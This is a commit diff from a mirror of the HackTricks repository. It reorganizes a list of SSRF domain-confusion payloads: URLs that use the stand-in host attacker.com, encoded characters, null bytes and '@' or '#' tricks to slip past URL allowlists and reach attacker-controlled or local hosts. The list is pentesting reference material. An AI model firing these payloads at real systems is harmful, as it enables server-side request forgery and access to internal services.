mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-15 01:17:36 +00:00
Reorganize Domain Confusion list in SSRF
* Remove duplicates * Add payloads
This commit is contained in:
parent
074cbf57bf
commit
a3d91ce362
1 changed files with 8 additions and 16 deletions
|
@ -120,26 +120,17 @@ attacker。com
|
|||
|
||||
```bash
|
||||
# Try also to change attacker.com for 127.0.0.1 to try to access localhost
|
||||
http://{domain}@attacker.com
|
||||
http://{domain}%6D@attacker.com
|
||||
https://www.victim.com(\u2044)some(\u2044)path(\u2044)(\u0294)some=param(\uff03)hash@attacker.com
|
||||
http://attacker.com#{domain}
|
||||
http://{domain}.attacker.com
|
||||
http://attacker.com/{domain}
|
||||
http://attacker.com/?d={domain}
|
||||
# Try replacing https by http
|
||||
# Try URL-encoded characters
|
||||
https://{domain}@attacker.com
|
||||
https://attacker.com#{domain}
|
||||
https://{domain}.attacker.com
|
||||
https://{domain}%6D@attacker.com
|
||||
https://attacker.com/{domain}
|
||||
https://attacker.com/?d={domain}
|
||||
http://{domain}@attacker.com
|
||||
http://attacker.com#{domain}
|
||||
http://{domain}.attacker.com
|
||||
http://attacker.com/{domain}
|
||||
http://attacker.com/?d={domain}
|
||||
http://attacker.com%00{domain}
|
||||
http://attacker.com?{domain}
|
||||
http://attacker.com///{domain}
|
||||
https://attacker.com#{domain}
|
||||
https://attacker.com@{domain}
|
||||
https://attacker.com#@{domain}
|
||||
https://attacker.com%23@{domain}
|
||||
https://attacker.com%00{domain}
|
||||
https://attacker.com%0A{domain}
|
||||
https://attacker.com?{domain}
|
||||
|
@ -153,6 +144,7 @@ https://attacker.com\@@{domain}
|
|||
https://attacker.com:\@@{domain}
|
||||
https://attacker.com#\@{domain}
|
||||
https://attacker.com\anything@{domain}/
|
||||
https://www.victim.com(\u2044)some(\u2044)path(\u2044)(\u0294)some=param(\uff03)hash@attacker.com
|
||||
|
||||
# On each IP position try to put 1 attackers domain and the others the victim domain
|
||||
http://1.1.1.1 &@2.2.2.2# @3.3.3.3/
|
||||
|
|
Loading…
Reference in a new issue